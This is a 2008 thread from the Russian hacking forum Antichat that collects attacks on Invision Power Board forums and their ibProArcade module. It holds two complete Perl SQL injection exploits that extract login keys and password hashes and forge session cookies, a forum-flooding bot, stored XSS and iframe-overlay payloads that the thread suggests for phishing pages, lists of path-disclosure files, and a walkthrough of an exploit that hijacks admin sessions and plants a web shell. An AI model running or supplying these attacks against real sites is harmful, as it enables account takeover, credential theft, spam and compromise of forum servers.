Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
ibProArcade <= v3.3.0 sql injection exploit |
27.10.2008, 17:15
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
ibProArcade <= v3.3.0 sql injection exploit
Автор: +toxa+
PHP код:
#!/usr/bin/perl
## ibProArcade <= v3.3.0 sql injection exploit
## (c)oded by 1dt.w0lf
## RST/GHC
## THIS IS UNPUBLISHED RST/GHC EXPLOIT CODE
## KEEP IT PRIVATE
use Tk;
use Tk::BrowseEntry;
use Tk::DialogBox;
use LWP::UserAgent;
BEGIN {
if($^O eq 'MSWin32'){
require Win32::Console;
Win32::Console::Free();
}
}
$mw = new MainWindow(title => "r57ibProArcade" );
$mw->geometry ( '420x310' ) ;
$mw->resizable(0,0);
$mw->Label(-text => '!', -font => '{Webdings} 22')->pack();
$mw->Label(-text => 'ibProArcade sql injection exploit by RST/GHC', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$mw->Label(-text => '')->pack();
$fleft=$mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ;
$fright=$mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ;
$url = 'http://127.0.0.1/ipb216/index.php';
$user_id = '1';
$prefix = 'ibf_';
$column = 'member_login_key';
$report = '';
$true = 0;
$false = 0;
$fleft->Label ( -text => 'Path to forum index: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $url) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'User ID: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $user_id) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'Database tables prefix: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $prefix) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fright->Label( -text => ' ')->pack();
$fleft->Label( -text => ' ')->pack();
$fleft->Label ( -text => 'get data from database', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Label( -text => ' ')->pack();
$fleft->Label ( -text => 'Get data from column: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$b = $fright->BrowseEntry( -relief => "groove", -variable => $column, -font => '{Verdana} 8');
$b->insert("end", "member_login_key");
$b->insert("end", "name");
$b->insert("end", "ip_address");
$b->insert("end", "legacy_password");
$b->insert("end", "email");
$b->pack( -side => "top" , -anchor => 'w' );
$fleft->Label ( -text => 'Returned data: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $report) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fright->Label( -text => ' ')->pack();
$fright->Button(-text => 'Test forum vulnerability',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => &test_vuln
)->pack();
$fright->Button(-text => 'Get database tables prefix',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => &get_prefix
)->pack();
$fright->Button(-text => 'Get data from database',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => &get_data
)->pack();
$fleft->Label( -text => ' ')->pack();
$fleft->Label( -text => '+++ PRIV8 +++', -font => '{Verdana} 7')->pack();
$fleft->Label( -text => '(c)oded by 1dt.w0lf', -font => '{Verdana} 7')->pack();
$fleft->Label( -text => 'RST/GHC', -font => '{Verdana} 7')->pack();
MainLoop();
sub get_data()
{
$true = &get_true();
$report = '';
$s_num=1;
while(($chr = &found(0,255))!=0){
$report .= chr($chr);
$mw->update();
$s_num++;
}
if(length($report) > 0) { &report('That\'s all ;)'); }
else { &report('Can\'t get data from database'); }
}
sub test_vuln()
{
$InfoWindow=$mw->DialogBox(-title => 'test forum vulnerability', -buttons => ["OK"]);
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$true = &get_true();
$false = &get_false();
if($true != $false) { $InfoWindow->add('Label', -text => 'FORUM VULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; }
else { $InfoWindow->add('Label', -text => 'FORUM UNVULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'green')->pack; }
$InfoWindow->Show();
$InfoWindow->destroy;
}
sub get_true()
{
$xpl = LWP::UserAgent->new( ) or die;
$res = $xpl->get($url."?autocom=arcade&overwrite_sort=added&overwrite_order=,(-gid*(1=1))");
if($res->as_string =~ /g=(d+)" target="hiddenframe"><img src="./arcade/images/addfav.gif"/) { $rep = $1; }
return $rep;
}
sub get_false()
{
$xpl = LWP::UserAgent->new( ) or die;
$res = $xpl->get($url."?autocom=arcade&overwrite_sort=added&overwrite_order=,(-gid*(1=2))");
if($res->as_string =~ /g=(\d+)" target="hiddenframe"><img src=".\/arcade\/images\/addfav.gif"/) { $rep = $1; }
return $rep;
}
sub get_prefix()
{
$InfoWindow=$mw->DialogBox(-title => 'get database tables prefix', -buttons => ["OK"]);
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$xpl = LWP::UserAgent->new( ) or die;
$res = $xpl->get($url."?autocom=arcade&overwrite_sort=added&overwrite_order=r57r0x");
if($res->is_success)
{
$rep = '';
if($res->as_string =~ /from (.*)games_list/)
{
$prefix = $1;
$InfoWindow->add('Label', -text => 'Prefix: '.$prefix, -font => '{Verdana} 8 bold')->pack;
}
else
{
$InfoWindow->add('Label', -text => 'Can\'t get prefix', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; }
}
else
{
$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
$InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
}
$InfoWindow->Show();
$InfoWindow->destroy;
}
sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}
sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}
sub check($)
{
$n++;
$rep = '';
$ccheck = $_[0];
$xpl = LWP::UserAgent->new( ) or die;
$res = $xpl->get($url.'?autocom=arcade',cookie=>'g_display_sort=added;g_display_order=,(-gid*(SELECT 1 FROM '.$prefix.'members WHERE (id='.$user_id.' AND ascii(substring('.$column.','.$s_num.',1))'.$cchec k.') LIMIT 1)) LIMIT 1');
if($res->as_string =~ /g=(d+)" target="hiddenframe"><img src="./arcade/images/addfav.gif"/) { $rep = $1; }
if($rep == $true) { return 1; }
else { return 0; }
}
sub report()
{
$InfoWindow=$mw->DialogBox(-title => 'Report', -buttons => ["OK"]);
$InfoWindow->add('Label', -text => $_[0], -font => '{Verdana} 7')->pack;
$InfoWindow->Show();
$InfoWindow->destroy;
}
PS Материал востановлен
Дата публикации: 30.01.2008, 21:01
Автор +toxa+
|
|
|
Invision Power Board <=v2.3.4 BBCodes XSS |
27.10.2008, 17:16
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Invision Power Board <=v2.3.4 BBCodes XSS
Автор: +toxa+
добавленный кодес в class_bbcode_core.php
PHP код:
......................
$match[ $_content ][$i] = preg_replace( '#(style)=#is', "$1=", $match[ $_content ][$i] );
$match[ $_option ][$i] = preg_replace( '#(style)=#is', "$1=", $match[ $_option ][$i] );
.......................
//-----------------------------------------
// Don't let emos in URL..
//-----------------------------------------
if ( $this->parse_smilies )
{
if ( count( $this->ipsclass->cache['emoticons'] ) > 0 )
{
foreach( $this->ipsclass->cache['emoticons'] as $row)
{
$code = $row['typed'];
$code = str_replace( '<', '<', str_replace( '>', '>', $code ) );
if( strpos( $url, $code ) )
{
$new = '';
for( $i=0; $i<strlen($code); $i++ )
{
//print dechex(ord($code{$i})).'<Br>';
$new .= '%' . dechex(ord($code{$i}));
}
$url = str_replace( $code, $new, $url );
}
}
// Using the :/ smiley
$url = str_replace( 'http%3a%2f', 'http:/', $url );
}
}
$url = htmlspecialchars($url);
.......................
//-----------------------------------------
// Don't let emos in URL..
//-----------------------------------------
if ( $this->parse_smilies )
{
if ( count( $this->ipsclass->cache['emoticons'] ) > 0 )
{
foreach( $this->ipsclass->cache['emoticons'] as $row)
{
$code = $row['typed'];
$code = str_replace( '<', '<', str_replace( '>', '>', $code ) );
if( strpos( $url['html'], $code ) )
{
$new = '';
for( $i=0; $i<strlen($code); $i++ )
{
//print dechex(ord($code{$i})).'<Br>';
$new .= '%' . dechex(ord($code{$i}));
}
$url['html'] = str_replace( $code, $new, $url['html'] );
}
}
// Using the :/ smiley
$url['html'] = str_replace( 'http%3a%2f', 'http:/', $url['html'] );
}
}
$url['html'] = htmlspecialchars( $url['html'] );
......................
кому интересно, думаете)
PS Материал востановлен
Дата публикации: 22.02.2008, 22:22
Автор +toxa+
|
|
|
|
XSS [Flash] in IPB v1.3, 2.1.5 и 2.2.2 |
27.10.2008, 17:17
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
XSS [Flash] in IPB v1.3, 2.1.5 и 2.2.2
Автор: iddqd
Vulnerable: 1.x и 2.x (тестировалось на Invision Power Board v1.3, 2.1.5 и 2.2.2).
XSS [Flash]
Из-за отсутствия защиты от исполнения JavaScript кода из flash, при включенной
поддержке флеша в сообщениях, атакующий может внедрить ссылку на специальный
флеш-файл в тело сообщения и атаковать всех участников форума, которые просмотрят
тему с данным сообщением. Атака может быть проведена через публикацию флешки в
сообщении на форуме, или установки её в качестве аватора.
PoC:
[flash=1,1]http://site/flash.swf[/flash]
Fix:
Для исправления данной уязвимости нужно установить свойство флеш-объекта
allowscriptaccess в "never".
PS Материал востановлен
Дата публикации: 08.03.2008, 15:14
Автор iddqd
|
|
|
|
IPB <=2.0.3 SQL-inj Exploit (c) h4cky0u |
27.10.2008, 17:18
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
IPB <=2.0.3 SQL-inj Exploit (c) h4cky0u
Автор: +toxa+
heres another sick xploit for 2.0.3 again coded by jamey224. Usally works, except for a few boards that are patched.Enjoy! (c) h4cky0u
http://h4cky0u.org/viewtopic.php?f=2&t=6110
PHP код:
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);
if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}
my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?
if (!$ARGV[2])
{
print "The type of the file system is NTFS.\n\n";
print "Exploit C0d3d By Jamey2244\n";
print "Yes I know I'm g00d\n";
print "LeTS g0!!!\n";
exit;
}
my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
my $outputs = '';
for( $i=1; $i < 33; $i++ )
{
for( $j=0; $j < 16; $j++ )
{
my $current = $charset[$j];
my $sql = ( $iver < 2 ) ? "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2 527$current%2527)/*" :
"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i ,1)%3d%2527$current%2527)/*";
my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
my $res = $ua->get($path, @cookie);
# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = '<title>(.*)Log In(.*)</title>';
$_ = $res->content;
if ($dbug) { print };
if ( !(/$pattern/) )
{
$outputs .= $current;
print "$current\n";
last;
}
}
if ( length($outputs) < 1 ) { print "Not Exploitable!\n"; exit; }
}
print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
exit;
PS Материал востановлен
Дата публикации: 16.03.2008, 16:02
Автор +toxa+
|
|
|
|
Invision Power Board <=2.3.x iFrame Vulnerability |
27.10.2008, 17:19
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Invision Power Board <=2.3.x iFrame Vulnerability
Автор: iddqd
1)Регистрируемся
2)Заходим в свой профиль
3)Изменяем подпись(html включен):
PHP код:
<html>
<head>
<title>Заголовок</title>
</head>
<body>
<div id="iFrame1" style="position:absolute; left:0px; top:0px; z-index:0">
<iframe name="iFrame1" width=1024 height=3186 src="http://адрес Вашей страницы.html" scrolling="no"
frameborder="0"></iframe>
</div>
</body>
</html>
4)Постим сообщение- страница форума перекрывается Вашей страницей.
Можно использовать для фейков.
PS Материал востановлен
Дата публикации: 27.03.2008, 19:01
Автор iddqd
|
|
|
|
Invision Power Board <=2.3.5 Active XSS |
27.10.2008, 17:20
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Invision Power Board <=2.3.5 Active XSS
Автор: %00
Invision Power Board <=2.3.5
Active XSS
Работает в ie
Не работает в opera
1) создаем файл any.html внути него <script>alert()</script>
2) содаем пост с аттачем any.html
В версиях ниже 2.3.х может не работать...
PS Материал востановлен
Дата публикации: 20.05.2008, 15:25
Автор %00
|
|
|
|
27.10.2008, 17:21
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Full path disclosure:
Автор: ettee
Full path disclosure:
ips_kernel/PEAR/Text/Diff3.php
ips_kernel/PEAR/Text/Diff/Renderer/inline.php
ips_kernel/class_db.php
ips_kernel/class_db_mysql.php
ips_kernel/class_xml.php
sources/sql/mysql_admin_queries.php
sources/sql/mysql_extra_queries.php
sources/sql/mysql_queries.php
sources/sql/mysql_subsm_queries.php
sources/loginauth/ldap/auth.php
sources/loginauth/convert/auth.php.bak
sources/loginauth/external/auth.php
sources/loginauth/ldap/auth.php
sources/classes/post/class_post_edit.php
sources/classes/post/class_post_new.php
sources/classes/post/class_post_reply.php
sources/classes/post/class_post.php
sources/classes/editor/class_editor_std.php
sources/classes/editor/class_editor_rte.php
sources/acp_loaders/acp_pages_components.php
sources/classes/bbcode/class_bbcode_legacy.php
sources/classes/bbcode/class_bbcode.php
sources/lib/search_mysql_man.php
sources/lib/search_mysql_ftext.php
sources/lib/func_usercp.php
sources/lib/search_mysql_ftext.php
sources/lib/search_mysql_man.php
sources/action_admin/member.php
sources/action_admin/paysubscriptions.php
sources/action_public/login.php
sources/action_public/messenger.php
sources/action_public/moderate.php
sources/action_public/paysubscriptions.php
sources/action_public/register.php
sources/action_public/search.php
sources/action_public/topics.php
sources/action_public/usercp.php
sources/components_acp/registration_DEPR.php
sources/handlers/han_paysubscriptions.php
Version detection:
jscripts/ipb_register.js
jscripts/ipb_global.js
jscripts/ips_profile_portal.js
PS Материал востановлен
Дата публикации: 02.06.2008, 21:32
Автор ettee
|
|
|
|
27.10.2008, 17:22
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
IPB Forum Flood
Автор: baltazar
ФЛудит как постами так и топиками,проверено на 2.1.7
PHP код:
#----------------------------
# this programe has been #
# created by NikTrix-Souvico #
# [ 'HellSoft' ] for #
# Flooding IPB Forums #
#----------------------------
#!/usr/bin/perl -w
use strict;
use LWP::UserAgent;
use HTTP::Cookies;
#Variables
my $url = undef;
my $login = undef;
my $UserName = undef;
my $PassWord = undef;
my $CookieDate = 1;
my $SID = undef;
my $SE = undef;
my $MSG = undef;
#Prototype
sub IPBFlood($);
#Main
print "\t\tWelcome to IPBFlood 0.1x By Souvik\t\t[ 'NikTrix' ]Team";
print "Url\t: ";chomp($url=);
print "UserName\t: ";chomp($UserName=);
print "Password\t: ";chomp($PassWord=);
print "Start [to] End\t: ";chomp($SE=);
print "Message\t: ";chomp($MSG=);
my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla/4.0");
my $cj = HTTP::Cookies->new(file => "N/A" , autosave => 0);
$ua->cookie_jar($cj);
#-get SID
my $r = $ua->get($url);
if($r->is_success){
#Find SID ?
($SID) = $r->content =~/\?s=(\w{32})&.*/i;
print "SID : $SID";
}
#-Connecting ...
$r = $ua->post($url.$login,[UserName=> $UserName ,PassWord => $PassWord ,CookieDate =>$CookieDate , s => $SID]);
if($r->is_success){
print "[+] Connected" if($r->content =~ /cliquez ici si vous ne souhaitez pas/gi);
my($Start , $End) = split(/-/,$SE);
foreach($Start..$End){
IPBFlood($_);
}
}
#Subroutines
sub IPBFlood($){
my $Topic = shift;
my $get = $ua->get($url."s=$SID&showtopic=$Topic");
if($get->is_success){
#Get Subforum ID "f" : variable !
if( my ($f) = $get->content =~/f=(\d{1,4})/ ){
print "[-]Subforum ID : $f & Topic N : $Topic";
#Get Post AuthKey for Subforum f=N°
$get = $ua->get($url."s=$SID&act=post&do=reply_post&f=$f&t=$Topic");
# act=post&do=reply_post&f=56&t=43988
if($get->is_success){
##auth_key Ex :
my ( $auth_key ) = $get->content =~/auth_key.*(\w{32})/i;
#attach_post_key Ex :
my ( $attach_post_key ) = $get->content =~/attach_post_key.*(\w{32})/i;
print "[-]auth_key : $auth_key[-]attach_post_key : $attach_post_key";
my %form =(st => 0,
act => "Post",
s => "$SID",
f => "$f",
auth_key => "$auth_key",
removeattachid => "0",
CODE => "03",
t => "$Topic",
attach_post_key => "$attach_post_key",
parent_id => "0",
"ed-0_wysiwyg_used"=> "0",
"editor_ids%5B%5D" => "ed-0",
Post => "$MSG",
enableemo => "yes",
enablesig => "yes",
iconid => "0"
);
$r = $ua->post($url."s=$SID",\%form);
if($r->is_success){
print "Send success !" if( length($r->content)< 300);
}
}
}
}
}
PS Материал востановлен
Дата публикации: 22.07.2008, 00:59
Автор baltazar
|
|
|
|
27.10.2008, 17:23
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Раскрытие пути
Автор: Nightmarе
Раскрытие пути в модуле "галерея" в IPB 2.3.5:
index.php?automodule=gallery&req[]=
Пример:
http://www.obzvon.com/forums/index.php?automodule=gallery&req[]=
Тока щас нашёл, работает везде, возможно кому-то пригодится.
PS Материал востановлен
Дата публикации: 09.08.2008, 02:06
Автор Nightmarе
|
|
|
|
Invision Power Board <= 2.3.5 Multiple Vulnerabilities |
27.10.2008, 17:33
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Invision Power Board <= 2.3.5 Multiple Vulnerabilities
Автор: Elekt
Invision Power Board <= 2.3.5
Multiple Vulnerabilities
http://acid-root.new.fr/?0:18
http://packetstormsecurity.org/filedesc/ipb235-multi.txt.html
Экспоит основывается на SQL-inj в параметре "name" файла "sources/action_public/xmlout.php"
и использует технологию классического посимвольного брута данных.
Особенность урленкода %2527 делает его независимым от magic_quotes.
/ipb235/index.php?s=&act=xmlout&do=check-display-name&name=%2527
IPS Driver Error
There appears to be an error with the database.
You can try to refresh the page by clicking here
В эксплоите предусмотрено три режима работы.
-attack 1
Через скуль получают сессию админа.
Из настроек извлекается инфа о привязке сессии к ip-address и browser.
Если таковая привязка имеется (включено по дефолту) и админ заходил не из под прокси - атака невозможна.
В ином случае - извлекаются ip-address и browser админа и производится попытка войти под админом.
В случае успешной попытки эксплоит прописывает веб-шелл в файл языка.
Вероятность успеха атаки мала, ибо:
~ сессия имет по дефолту привязку к айпи и браузеру
~ время жизни сессии скорее всего просрочено. придется караулить админа, либо спровоцировать его зайти в админку.
Сам процесс "ожидания" в эксплоите реализован в цикле - ожидание появления новой сессии.
Пример запуска эксплойта:
php ipb235-multi.txt -attack 1 -url http://www.ipb-235.com/forum/
-attack 2
Как ни удивительно - в сессии cookie *ipb_stronghold пользователя присутствует пароль к БД.
Используя атаку по словарю, эксплоит пытается сбрутить пароль к БД из хеша сессии.
Через скуль эксплоит получает имя текущего пользователя БД.
Необходима валидная учетная запись, либо куки со сниффера.
Вероятность успеха мала и зависит в большей мере от вашего словаря и рэндомности пароля.
Пример запуска эксплойта:
php ipb235-multi.txt -attack 2 -url http://www.ipb-235.com/forum/ -ip <ВАШ_IP> -dict passwd.txt -uname mynick -pwd password
Разложим алгоритм генерации сессии:
PHP код:
$md5 = md5(trim($line).$this->p_sql_u);
$md5 = md5($this->p_uid.'-'.$ip_a[0].'-'.$ip_a[1].'-'.$this->p_hash).$md5;
$md5 = md5($md5);
Преобразуем к:
PHP код:
PHP код:
md5(md5($this->p_uid.'-'.$ip_a[0].'-'.$ip_a[1].'-'.$this->p_hash).md5($pass.$this->p_sql_u))
Тогда
~ если *member_id нашего юзера, например, 1745
~ если у нас ip, например, 192.168.5.235
~ если cookie *pass_hash, например, 12345678901234567890123456789012
~ если мы знаем заведомо\получили через SQL-inj имя текущего SQL-юзера к БД, например, sqladmin@localhost
Тогда:
PHP код:
md5(md5('1745-192-168-12345678901234567890123456789012'). md5($pass.'sqladmin'))
Посмотрел модули в PasswordPro - можно брутить пасс из него по маске.
Используем модуль md5(md5($salt).md5($pass))
Ставьте атаку по маске, например, как
?|?|?|?|?|?|?|?|sqladmin
где как видите в конце маски идет sql юзер БД.
Ну подмаску ?| (a-z) можете выбрать и другую, однако тройной мд5 будет аццки тормозить на широком диапазоне символов...
-attack 3
И наконец-то класическая добыча пароля пользователя + соль.
Встроенный в эксплоит брутфорс попробует перебрать найденный хеш по словарю,
хотя рекомендую перебирать чем-нить по шустрее.
php ipb235-multi.txt -attack 3 -url http://www.ipb-235.com/forum/ -dict passwd.txt
Реализован режим обхода IDS. Вобщем, автору DarkFig - большой респект.
Я немного оптимизировал код.
Максимальная скорость работы возросла в среднем в 2.5 раза.
На примере атаки #3 : оригинальному эксплоиту потребуется около 500 запросов для брута md5 хеша + соли.
Мой вариант для тойже задачи потребует не более 200
ver1.5
-----------------------
Сдесь аттач с программой  (у кого права есть, поставьте, будте так добры )
-----------------------
PS Материал востановлен
Дата публикации: 30.08.2008, 10:50
Автор Elekt
Последний раз редактировалось Elekt; 18.09.2009 в 04:07..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
